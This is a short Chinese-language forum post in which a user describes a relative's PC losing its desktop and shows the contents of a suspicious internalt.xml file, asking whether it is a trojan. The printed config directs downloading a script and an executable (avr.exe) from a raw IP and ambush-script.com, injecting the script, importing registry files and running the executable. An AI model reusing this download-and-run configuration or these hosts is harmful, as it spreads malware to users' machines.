弟弟的電腦.今天上網時.突然桌面都沒啦!!
防毒_PCC2004..卻沒出現病毒!這時查看檔案..多了 internalt.xml G4Y_Header.js
他EMail給我(附加二個檔案).我的卡巴基也沒有掃到..但G4Y_Header.js被OutLook EXpress檔了下來.
internalt.xml用記事本開啟如下:
<?xml version="1.0" encoding="utf-8"?><config>
<add_remove_hide />
<download url="
http://195.225.177.20/ourb...er.js" file="%windir%\g4y_header.js" />
<insertjs srcurl="file://%windir%/g4y_header.js" />
<registry url="
http://195.225.177.20/ourb...e.reg" />
<registry url="
http://ambush-script.com/ld/...go.reg" />
<download url="
http://195.225.177.20/o...exe" file="%windir%\avr.exe" />
<run command="%windir%\avr.exe" />
</config>
這是木馬吧!!